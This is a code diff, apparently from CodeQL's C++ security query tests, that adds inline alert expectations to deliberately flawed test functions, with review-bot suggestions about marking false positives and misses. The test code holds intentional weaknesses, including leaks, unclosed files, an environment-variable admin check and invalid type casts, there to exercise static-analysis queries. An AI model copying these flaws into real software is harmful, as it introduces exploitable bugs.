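Review bot: The three lines whose existing comment says `[FALSE POSITIVE]` (in the test_10, test_11 and test_mutex hunks) are tagged with a plain `Alert[cpp/unreleased-lock]`, which records the result as a wanted finding. The inline-expectations format has a `SPURIOUS:` marker for this case, e.g. `if (!mtx.try_lock()) { // [FALSE POSITIVE] // $ SPURIOUS: Alert[cpp/unreleased-lock]`. With it, the test output separates known false positives from true ones, and a later precision fix to the query is reported as a fixed spurious result rather than as a lost alert. All three functions continue outside their hunks.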
@@ -479,7 +479,7 @@ int test_MyClass_good(MyClass *obj) int test_MyClass_bad(MyClass *obj) { - pthread_mutex_lock(&obj->lock); + pthread_mutex_lock(&obj->lock); // $ Alert[cpp/unreleased-lock] if (maybe()) { return -1; // BAD diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/FileMayNotBeClosed.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/FileMayNotBeClosed.qlref index fd711c007f04..8d189be099bf 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/FileMayNotBeClosed.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/FileMayNotBeClosed.qlref @@ -1 +1,2 @@ -Critical/FileMayNotBeClosed.ql \ No newline at end of file +query: Critical/FileMayNotBeClosed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/FileNeverClosed.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/FileNeverClosed.qlref index 825ac26f500c..25b57b1736d7 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/FileNeverClosed.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/FileNeverClosed.qlref @@ -1 +1,2 @@ -Critical/FileNeverClosed.ql +query: Critical/FileNeverClosed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/MemoryMayNotBeFreed.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/MemoryMayNotBeFreed.qlref index 33da8e296e22..84fd18014db0 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/MemoryMayNotBeFreed.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/MemoryMayNotBeFreed.qlref @@ -1 +1,2 @@ -Critical/MemoryMayNotBeFreed.ql \ No newline at end of file +query: Critical/MemoryMayNotBeFreed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/MemoryNeverFreed.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/MemoryNeverFreed.qlref index 2d1336a55ebf..108a872987d7 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/MemoryNeverFreed.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/MemoryNeverFreed.qlref @@ -1 +1,2 @@ -Critical/MemoryNeverFreed.ql \ No newline at end of file +query: Critical/MemoryNeverFreed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/tests.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/tests.cpp index e7b889deb08c..83770de1c98b 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/tests.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-772/SAMATE/tests.cpp @@ -68,7 +68,7 @@ namespace CWE401_Memory_Leak__new_int_17 for(i = 0; i < 1; i++) { /* POTENTIAL FLAW: Allocate memory on the heap */ - data = new int; // BAD + data = new int; // BAD // $ Alert[cpp/memory-never-freed] /* Initialize and make use of data */ *data = 5; printIntLine(*data); @@ -133,7 +133,7 @@ void CWE401_Memory_Leak__char_malloc_32_bad() { char * data = *dataPtr1; /* POTENTIAL FLAW: Allocate memory on the heap */ - data = (char *)malloc(100*sizeof(char)); // BAD + data = (char *)malloc(100*sizeof(char)); // BAD // $ Alert[cpp/memory-never-freed] /* Initialize and make use of data */ strcpy(data, "A String"); printLine(data); @@ -195,7 +195,7 @@ static void CWE401_Memory_Leak__char_malloc_32_goodB2G() void CWE401_Memory_Leak__malloc_realloc_char_01_bad() { { - char * data = (char *)malloc(100*sizeof(char)); // BAD + char * data = (char *)malloc(100*sizeof(char)); // BAD // $ Alert[cpp/memory-may-not-be-freed] /* Initialize and make use of data */ strcpy(data, "A String"); printLine(data); 
@@ -217,7 +217,7 @@ void CWE775_Missing_Release_of_File_Descriptor_or_Handle__fopen_no_close_17_bad( FILE * data; data = NULL; /* POTENTIAL FLAW: Open a file without closing it */ - data = fopen("BadSource_fopen.txt", "w+"); // BAD + data = fopen("BadSource_fopen.txt", "w+"); // BAD // $ Alert[cpp/file-never-closed] for(j = 0; j < 1; j++) { /* FLAW: No attempt to close the file */ @@ -249,7 +249,7 @@ void CWE775_Missing_Release_of_File_Descriptor_or_Handle__open_no_close_01_bad() /* Initialize data */ data = -1; /* POTENTIAL FLAW: Open a file without closing it */ - data = OPEN("BadSource_open.txt", O_RDWR|O_CREAT, S_IREAD|S_IWRITE); // BAD + data = OPEN("BadSource_open.txt", O_RDWR|O_CREAT, S_IREAD|S_IWRITE); // BAD // $ Alert[cpp/file-never-closed] /* FLAW: No attempt to close the file */ ; /* empty statement needed for some flow variants */ } @@ -275,7 +275,7 @@ void CWE775_Missing_Release_of_File_Descriptor_or_Handle__w32CreateFile_no_close /* Initialize data */ data = INVALID_HANDLE_VALUE; /* POTENTIAL FLAW: Open a file without closing it */ - data = CreateFile("BadSource_w32CreateFile.txt", // BAD + data = CreateFile("BadSource_w32CreateFile.txt", // BAD // $ Alert[cpp/file-never-closed] (GENERIC_WRITE|GENERIC_READ), 0, NULL, @@ -322,7 +322,7 @@ void CWE401_Memory_Leak__twoIntsStruct_realloc_01_bad() twoIntsStruct * data; data = NULL; /* POTENTIAL FLAW: Allocate memory on the heap */ - data = (twoIntsStruct *)realloc(data, 100*sizeof(twoIntsStruct)); + data = (twoIntsStruct *)realloc(data, 100*sizeof(twoIntsStruct)); // $ Alert[cpp/memory-may-not-be-freed] if (data == NULL) {exit(-1);} /* Initialize and make use of data */ data[0].intOne = 0; diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/FileMayNotBeClosed.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/FileMayNotBeClosed.qlref index fd711c007f04..8d189be099bf 100644 
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/FileMayNotBeClosed.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/FileMayNotBeClosed.qlref @@ -1 +1,2 @@ -Critical/FileMayNotBeClosed.ql \ No newline at end of file +query: Critical/FileMayNotBeClosed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/FileNeverClosed.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/FileNeverClosed.qlref index 825ac26f500c..25b57b1736d7 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/FileNeverClosed.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/FileNeverClosed.qlref @@ -1 +1,2 @@ -Critical/FileNeverClosed.ql +query: Critical/FileNeverClosed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/test.cpp index 1e24ded49f53..ae7c1e5cdc09 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-file/test.cpp @@ -48,7 +48,7 @@ void test4() FILE *f; // fopen, never fclose (BAD: f is never closed) - f = fopen("myFile.txt", "wt"); + f = fopen("myFile.txt", "wt"); // $ Alert[cpp/file-never-closed] } void test5(int cond) @@ -56,7 +56,7 @@ void test5(int cond) FILE *f; // fopen, sometimes fclose (BAD: f is not always closed) - f = fopen("myFile.txt", "wt"); + f = fopen("myFile.txt", "wt"); // $ Alert[cpp/file-may-not-be-closed] if (cond == 0) { fclose(f); @@ -66,7 +66,7 @@ void test5(int cond) void test6(int cond) { // fopen, sometimes fclose (BAD: f is not always closed) - FILE *f = fopen("myFile.txt", "wt"); + FILE *f = fopen("myFile.txt", "wt"); // $ Alert[cpp/file-may-not-be-closed] if (cond == 0) { 
@@ -82,7 +82,7 @@ void test7() // fopen, assign, close f twice (BAD: g is never closed) f = fopen("myFile.txt", "wt"); - g = fopen("myFile.txt", "wt"); + g = fopen("myFile.txt", "wt"); // $ Alert[cpp/file-may-not-be-closed] g = f; fclose(g); fclose(f); @@ -112,10 +112,10 @@ void test8(int cond) test8_close(f); // fopen, don't close (BAD: g is never closed) - g = test8_open(); + g = test8_open(); // $ Alert[cpp/file-may-not-be-closed] // fopen, sometimes fclose (BAD: h is not always closed) - h = test8_open(); + h = test8_open(); // $ Alert[cpp/file-may-not-be-closed] if (cond == 0) { return; @@ -130,7 +130,7 @@ class myClass9 { a = fopen("myFile1.txt", "rt"); // closed in destructor (GOOD) b = fopen("myFile2.txt", "rt"); // unreliably closed in destructor (BAD) [NOT REPORTED] - c = fopen("myFile3.txt", "rt"); // never closed in destructor (BAD) + c = fopen("myFile3.txt", "rt"); // never closed in destructor (BAD) // $ Alert[cpp/file-never-closed] } void myOpenMethod(const char *filename) @@ -181,7 +181,7 @@ void test11() FILE *f, *g; // fopen, assign, but do not close (BAD) - f = fopen("myFile1.bin", "rb"); + f = fopen("myFile1.bin", "rb"); // $ Alert[cpp/file-never-closed] g = f; } @@ -218,7 +218,7 @@ void test13(int cond) void test14() { - FILE *f = fopen("f.txt", "rt"); // fopen, forget, don't close (BAD) + FILE *f = fopen("f.txt", "rt"); // fopen, forget, don't close (BAD) // $ Alert[cpp/file-may-not-be-closed] f = 0; fclose(f); @@ -237,7 +237,7 @@ void test15() void test16() { FILE *f = fopen("f.txt", "rt"); // fopen, always close in loop (GOOD) - FILE *g = fopen("g.txt", "rt"); // fopen, don't close in loop (BAD) + FILE *g = fopen("g.txt", "rt"); // fopen, don't close in loop (BAD) // $ Alert[cpp/file-may-not-be-closed] int i; for (i = 0; i < 1; i++) 
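Review bot: The known miss on the `b = fopen("myFile2.txt", "rt")` line in the myClass9 hunk (comment `[NOT REPORTED]`) stays outside the machine-checked expectations, while the `c = fopen(...)` line next to it gets a tag. A `MISSING:` marker would record it, e.g. `// $ MISSING: Alert[cpp/file-may-not-be-closed]`; the query id is assumed from the "unreliably closed" wording and should be confirmed. The same applies to the `b = (char *)malloc(1); ... [NOT REPORTED]` line in the myClass11 hunk of tests-memory/test.cpp. Both constructors start and end outside their hunks.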
@@ -250,7 +250,7 @@ void test16() void test17() { - FILE *f = fopen("f.txt", "rt"); // fopen, don't close in loop (BAD) + FILE *f = fopen("f.txt", "rt"); // fopen, don't close in loop (BAD) // $ Alert[cpp/file-may-not-be-closed] int i; for (i = 0; i < 0; i++) @@ -273,7 +273,7 @@ void test18() void test19() { - FILE *f = fopen("f.txt", "rt"); // fopen, return in loop, don't close (BAD) + FILE *f = fopen("f.txt", "rt"); // fopen, return in loop, don't close (BAD) // $ Alert[cpp/file-may-not-be-closed] int i; for (i = 0; i < 1; i++) @@ -296,7 +296,7 @@ void test20() void test21() { - FILE *f = fopen("f.txt", "rt"); // fopen, don't close in loop increment (BAD) + FILE *f = fopen("f.txt", "rt"); // fopen, don't close in loop increment (BAD) // $ Alert[cpp/file-may-not-be-closed] int i; for (i = 0; i < 0; fclose(f)) @@ -307,7 +307,7 @@ void test21() void test22() { FILE *f = fopen("f.txt", "rt"); // fopen, close in condition inside loop (GOOD) - FILE *g = fopen("g.txt", "rt"); // fopen, don't close in condition inside loop (BAD) + FILE *g = fopen("g.txt", "rt"); // fopen, don't close in condition inside loop (BAD) // $ Alert[cpp/file-may-not-be-closed] bool b = true; while (b) @@ -353,7 +353,7 @@ void test24() void test25() { - FILE *f = fopen("f.txt", "rt"); // fopen, don't close in nested loops (BAD) + FILE *f = fopen("f.txt", "rt"); // fopen, don't close in nested loops (BAD) // $ Alert[cpp/file-may-not-be-closed] int i, j, k; for (i = 0; i < 1; i++) @@ -381,7 +381,7 @@ void test26() void test27() { - FILE *f = fopen("f.txt", "rt"); // fopen, don't close after loop (BAD) + FILE *f = fopen("f.txt", "rt"); // fopen, don't close after loop (BAD) // $ Alert[cpp/file-may-not-be-closed] int i; for (i = 0; i < 10; i++) 
@@ -460,7 +460,7 @@ void test29() void test30() { // cases that do not involve a variable - fopen("myFile.txt", "wt"); // BAD: not closed + fopen("myFile.txt", "wt"); // BAD: not closed // $ Alert[cpp/file-never-closed] fclose(fopen("myFile.txt", "wt")); // GOOD } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/MemoryMayNotBeFreed.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/MemoryMayNotBeFreed.qlref index 33da8e296e22..84fd18014db0 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/MemoryMayNotBeFreed.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/MemoryMayNotBeFreed.qlref @@ -1 +1,2 @@ -Critical/MemoryMayNotBeFreed.ql \ No newline at end of file +query: Critical/MemoryMayNotBeFreed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/MemoryNeverFreed.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/MemoryNeverFreed.qlref index 2d1336a55ebf..108a872987d7 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/MemoryNeverFreed.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/MemoryNeverFreed.qlref @@ -1 +1,2 @@ -Critical/MemoryNeverFreed.ql \ No newline at end of file +query: Critical/MemoryNeverFreed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/test.cpp index 29b5709b9654..7bc2b737057e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-772/semmle/tests-memory/test.cpp 
@@ -59,7 +59,7 @@ void test5(int cond) // malloc, sometimes free void *ptr; - ptr = malloc(sizeof(char) * 1024); // BAD: not always freed + ptr = malloc(sizeof(char) * 1024); // BAD: not always freed // $ Alert[cpp/memory-may-not-be-freed] if (cond == 0) { free(ptr); @@ -71,7 +71,7 @@ void test6(int cond) // malloc, sometimes free void *ptr; - ptr = malloc(sizeof(char) * 1024); // BAD: not always freed + ptr = malloc(sizeof(char) * 1024); // BAD: not always freed // $ Alert[cpp/memory-may-not-be-freed] if (cond == 0) { return; @@ -95,7 +95,7 @@ void test8() // malloc, reassign, don't free char *a, *b; - a = (char *)malloc(10); // BAD: a is not freed + a = (char *)malloc(10); // BAD: a is not freed // $ Alert[cpp/memory-never-freed] b = a; } @@ -104,7 +104,7 @@ void test9() // malloc, overwrite, don't free char *a; - a = (char *)malloc(10); // BAD: not freed + a = (char *)malloc(10); // BAD: not freed // $ Alert[cpp/memory-may-not-be-freed] a = (char *)malloc(20); free(a); } @@ -133,10 +133,10 @@ void test10(int cond) test10_free(a); // alloc, don't free b - b = test10_alloc(); // BAD: b is never freed + b = test10_alloc(); // BAD: b is never freed // $ Alert[cpp/memory-may-not-be-freed] // alloc, sometimes free c - c = test10_alloc(); // BAD: c is not always freed + c = test10_alloc(); // BAD: c is not always freed // $ Alert[cpp/memory-may-not-be-freed] if (cond == 0) { return; @@ -151,7 +151,7 @@ class myClass11 { a = (char *)malloc(1); // freed in destructor (GOOD) b = (char *)malloc(1); // unreliably freed in destructor (BAD) [NOT REPORTED] - c = (char *)malloc(1); // never freed in destructor (BAD) + c = (char *)malloc(1); // never freed in destructor (BAD) // $ Alert[cpp/memory-never-freed] } void myAllocMethod(int amount) 
@@ -196,9 +196,9 @@ void test13() void *a = new int; // new, delete (GOOD) void *b = new char[10]; // new, delete (GOOD) char *c = new char[20]; // new, delete (GOOD) - void *d = new int; // new, don't delete (BAD) - void *e = new char[10]; // new, don't delete (BAD) - char *f = new char[20]; // new, don't delete (BAD) + void *d = new int; // new, don't delete (BAD) // $ Alert[cpp/memory-never-freed] + void *e = new char[10]; // new, don't delete (BAD) // $ Alert[cpp/memory-never-freed] + char *f = new char[20]; // new, don't delete (BAD) // $ Alert[cpp/memory-never-freed] delete (int *)a; delete [] (int *)b; @@ -232,26 +232,26 @@ void test14() ff(a); // alloc, don't free via function pointer (BAD) - b = af(2000); + b = af(2000); // $ Alert[cpp/memory-may-not-be-freed] } void test15() { void *ptr1, *ptr2, *ptr3; - ptr1 = realloc(NULL, 10); // alloc 10 bytes (BAD - not freed if the next realloc fails) + ptr1 = realloc(NULL, 10); // alloc 10 bytes (BAD - not freed if the next realloc fails) // $ Alert[cpp/memory-may-not-be-freed] ptr1 = realloc(ptr1, 20); // realloc 20 bytes (GOOD) ptr1 = realloc(ptr1, 0); // free (GOOD) - ptr2 = realloc(NULL, 10); // alloc 10 bytes (BAD - only freed if the call below succeeds) - ptr2 = realloc(ptr2, 20); // realloc 20 bytes, never free (BAD) + ptr2 = realloc(NULL, 10); // alloc 10 bytes (BAD - only freed if the call below succeeds) // $ Alert[cpp/memory-may-not-be-freed] + ptr2 = realloc(ptr2, 20); // realloc 20 bytes, never free (BAD) // $ Alert[cpp/memory-may-not-be-freed] - ptr3 = realloc(NULL, 10); // alloc 10 bytes, never free (BAD) + ptr3 = realloc(NULL, 10); // alloc 10 bytes, never free (BAD) // $ Alert[cpp/memory-never-freed] } void test16(int cond) { - void *ptr = malloc(1024); // not always freed (BAD) + void *ptr = malloc(1024); // not always freed (BAD) // $ Alert[cpp/memory-may-not-be-freed] if (ptr) { if (cond) 
@@ -271,7 +271,7 @@ void test16(int cond) void test17(int cond) { // malloc, sometimes free (BAD: ptr is not always freed) - void *ptr = malloc(1024); + void *ptr = malloc(1024); // $ Alert[cpp/memory-may-not-be-freed] if (cond == 0) { @@ -284,7 +284,7 @@ void test17(int cond) void test18(int cond) { // malloc, sometimes free (BAD: ptr is not always freed) - void *ptr = malloc(1024); + void *ptr = malloc(1024); // $ Alert[cpp/memory-may-not-be-freed] if (cond == 0) { @@ -352,12 +352,12 @@ void test22(int cond) { // new, don't delete (BAD) - Vector3 *myVector2 = new Vector3(1.0f, 2.0f, 3.0f); + Vector3 *myVector2 = new Vector3(1.0f, 2.0f, 3.0f); // $ Alert[cpp/memory-never-freed] } { // new, sometimes delete (BAD) - Vector3 *myVector3 = new Vector3(1.0f, 2.0f, 3.0f); + Vector3 *myVector3 = new Vector3(1.0f, 2.0f, 3.0f); // $ Alert[cpp/memory-may-not-be-freed] if (cond) { delete myVector3; @@ -379,7 +379,7 @@ void test23() { { // malloc, free incorrectly (BAD) - char *buffer = (char *)malloc(100); + char *buffer = (char *)malloc(100); // $ Alert[cpp/memory-may-not-be-freed] free(buffer + 10); } @@ -394,7 +394,7 @@ void test23() { // new, delete incorrectly - container *c = new container; // BAD: not deleted + container *c = new container; // BAD: not deleted // $ Alert[cpp/memory-never-freed] c->thingPtr = new thing; delete c->thingPtr; @@ -448,7 +448,7 @@ void test25() } realloc(ptr2, 0); // equivalent to free(ptr2) (GOOD) - ptr3 = realloc(NULL, 10); // alloc 10 bytes (BAD - not freed if next realloc fails) + ptr3 = realloc(NULL, 10); // alloc 10 bytes (BAD - not freed if next realloc fails) // $ Alert[cpp/memory-may-not-be-freed] ptr4 = realloc(ptr3, 20); // realloc 20 bytes (GOOD) if (ptr4 != NULL) // (this checks for success instead of failure!) { 
@@ -457,7 +457,7 @@ void test25() } realloc(ptr4, 0); // equivalent to free(ptr4) (GOOD) - ptr5 = realloc(NULL, 10); // alloc 10 bytes (BAD - not freed if the next realloc fails) + ptr5 = realloc(NULL, 10); // alloc 10 bytes (BAD - not freed if the next realloc fails) // $ Alert[cpp/memory-may-not-be-freed] ptr6 = realloc(ptr5, 20); // realloc 20 bytes (GOOD) ptr7 = realloc(ptr6, 0); // free (GOOD) } @@ -519,10 +519,10 @@ void test27() { void *ptr = NULL; - ptr = realloc(ptr, 10); // BAD (not freed if the second realloc fails) + ptr = realloc(ptr, 10); // BAD (not freed if the second realloc fails) // $ Alert[cpp/memory-may-not-be-freed] if (ptr != NULL) { - ptr = realloc(ptr, 20); // BAD (not freed) + ptr = realloc(ptr, 20); // BAD (not freed) // $ Alert[cpp/memory-may-not-be-freed] if (ptr != NULL) { dostuff(); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.expected index fc3a964b2bf3..5a1e5dbcbc5b 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.expected @@ -1,3 +1,5 @@ +#select +| test.cpp:24:10:24:35 | ! ... | test.cpp:20:29:20:47 | *call to getenv | test.cpp:24:10:24:35 | ! ... | Reliance on $@ to raise privilege at $@. | test.cpp:20:29:20:47 | *call to getenv | an environment variable | test.cpp:25:9:25:27 | ... = ... | ... = ... | edges | test.cpp:20:29:20:47 | *call to getenv | test.cpp:20:29:20:47 | *call to getenv | provenance | | | test.cpp:20:29:20:47 | *call to getenv | test.cpp:24:10:24:35 | ! ... | provenance | TaintFunction | 
@@ -6,5 +8,3 @@ nodes | test.cpp:20:29:20:47 | *call to getenv | semmle.label | *call to getenv | | test.cpp:24:10:24:35 | ! ... | semmle.label | ! ... | subpaths -#select -| test.cpp:24:10:24:35 | ! ... | test.cpp:20:29:20:47 | *call to getenv | test.cpp:24:10:24:35 | ! ... | Reliance on $@ to raise privilege at $@. | test.cpp:20:29:20:47 | *call to getenv | an environment variable | test.cpp:25:9:25:27 | ... = ... | ... = ... | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.qlref index bb8c6c324a30..b12367abe280 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-807/TaintedCondition.ql \ No newline at end of file +query: Security/CWE/CWE-807/TaintedCondition.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/test.cpp index 641cbaa7be7d..2f7eaa12ccad 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/test.cpp @@ -17,11 +17,11 @@ const char *currentUser; void processRequest() { - const char *userName = getenv("USER_NAME"); + const char *userName = getenv("USER_NAME"); // $ Source // BAD: the condition is controllable by the user, and // the body of the if makes a security decision. - if (!strcmp(userName, "admin")) { + if (!strcmp(userName, "admin")) { // $ Alert adminPrivileges = 1; } 
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-835/semmle/InfiniteLoopWithUnsatisfiableExitCondition/InfiniteLoopWithUnsatisfiableExitCondition.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-835/semmle/InfiniteLoopWithUnsatisfiableExitCondition/InfiniteLoopWithUnsatisfiableExitCondition.qlref index cef3e6686eac..e734453a5d94 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-835/semmle/InfiniteLoopWithUnsatisfiableExitCondition/InfiniteLoopWithUnsatisfiableExitCondition.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-835/semmle/InfiniteLoopWithUnsatisfiableExitCondition/InfiniteLoopWithUnsatisfiableExitCondition.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-835/InfiniteLoopWithUnsatisfiableExitCondition.ql \ No newline at end of file +query: Security/CWE/CWE-835/InfiniteLoopWithUnsatisfiableExitCondition.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-835/semmle/InfiniteLoopWithUnsatisfiableExitCondition/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-835/semmle/InfiniteLoopWithUnsatisfiableExitCondition/test.cpp index 4ff375910036..7d6b3585df2d 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-835/semmle/InfiniteLoopWithUnsatisfiableExitCondition/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-835/semmle/InfiniteLoopWithUnsatisfiableExitCondition/test.cpp @@ -5,7 +5,7 @@ void test00(int n) { } while (1) { // BAD: condition is never true, so loop will not terminate. - if (i == n) { + if (i == n) { // $ Alert break; } } @@ -18,7 +18,7 @@ void test01(int n) { } for (;;) { // BAD: condition is never true, so loop will not terminate. - if (i == n) { + if (i == n) { // $ Alert break; } } @@ -59,7 +59,7 @@ int test05() { int result = 0; // BAD: loop condition is always true. - for (i = 0; i >= 0; i = (i + 1) % 256) + for (i = 0; i >= 0; i = (i + 1) % 256) // $ Alert { result++; } 
@@ -108,7 +108,7 @@ void test08(int n) { for (i = 0;;) { // BAD: condition is never true, so loop will not terminate. - if (i == n) { + if (i == n) { // $ Alert break; } @@ -124,7 +124,7 @@ void test09(char *str) { { c = *(str++); - if (c < 'a' && c > 'z') // BAD: this condition is always false. + if (c < 'a' && c > 'z') // BAD: this condition is always false. // $ Alert return; } } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.expected index 6e18306bcd29..a805d06e1e22 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.expected 
@@ -1,3 +1,13 @@ +#select +| test.cpp:28:25:28:55 | p | test.cpp:27:13:27:18 | new | test.cpp:28:25:28:55 | p | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:11:8:11:21 | Not_S1_wrapper | Not_S1_wrapper | +| test.cpp:33:12:33:30 | p | test.cpp:32:13:32:30 | new | test.cpp:33:12:33:30 | p | Conversion from $@ to $@ is invalid. | test.cpp:11:8:11:21 | Not_S1_wrapper | Not_S1_wrapper | test.cpp:1:8:1:9 | S1 | S1 | +| test.cpp:67:12:67:31 | a | test.cpp:66:15:66:21 | new | test.cpp:67:12:67:31 | a | Conversion from $@ to $@ is invalid. | test.cpp:55:8:55:10 | Cat | Cat | test.cpp:60:8:60:10 | Dog | Dog | +| test.cpp:128:24:128:59 | s2 | test.cpp:127:12:127:17 | new | test.cpp:128:24:128:59 | s2 | Conversion from $@ to $@ is invalid. | test.cpp:102:8:102:9 | S2 | S2 | test.cpp:119:8:119:20 | Not_S2_prefix | Not_S2_prefix | +| test.cpp:145:28:145:68 | s1_2 | test.cpp:143:14:143:19 | new | test.cpp:145:28:145:68 | s1_2 | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:131:8:131:23 | HasSomeBitFields | HasSomeBitFields | +| test.cpp:159:14:159:33 | a | test.cpp:153:9:153:15 | new | test.cpp:159:14:159:33 | a | Conversion from $@ to $@ is invalid. | test.cpp:60:8:60:10 | Dog | Dog | test.cpp:55:8:55:10 | Cat | Cat | +| test.cpp:189:25:189:45 | u64 | test.cpp:187:15:187:24 | new | test.cpp:189:25:189:45 | u64 | Conversion from $@ to $@ is invalid. | test.cpp:175:8:175:13 | UInt64 | UInt64 | test.cpp:184:8:184:22 | UInt8_with_more | UInt8_with_more | +| test.cpp:218:30:218:65 | p | test.cpp:217:13:217:18 | new | test.cpp:218:30:218:65 | p | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:212:8:212:26 | UnrelatedStructSize | UnrelatedStructSize | +| test.cpp:227:29:227:63 | p | test.cpp:226:13:226:18 | new | test.cpp:227:29:227:63 | p | Conversion from $@ to $@ is invalid. 
| test.cpp:1:8:1:9 | S1 | S1 | test.cpp:221:8:221:25 | TooLargeBufferSize | TooLargeBufferSize | edges | test.cpp:17:13:17:18 | new | test.cpp:17:13:17:18 | new | provenance | | | test.cpp:17:13:17:18 | new | test.cpp:18:21:18:47 | p | provenance | | 
